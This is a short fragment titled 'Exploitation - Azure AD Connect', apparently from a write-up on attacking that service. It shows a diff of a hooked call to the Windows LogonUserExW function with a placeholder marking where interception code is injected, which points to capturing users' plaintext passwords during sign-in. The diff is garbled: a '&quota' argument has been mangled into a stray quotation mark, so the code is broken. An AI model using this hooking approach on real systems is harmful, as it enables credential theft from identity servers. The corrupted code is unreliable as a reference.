Exploitation - Azure AD Connect

 // Forward request to LogonUserExW and return result

-ret = LogonUserExW(username, domain, password, logonType, logonProvider, hToken, &logonSID, &profileBuffer, &profileLength, &quota);
+ret = LogonUserExW(username, domain, password, logonType, logonProvider, hToken, &logonSID, &profileBuffer, &profileLength, "a);

 // <INJECTED_CODE_INTERCEPTION>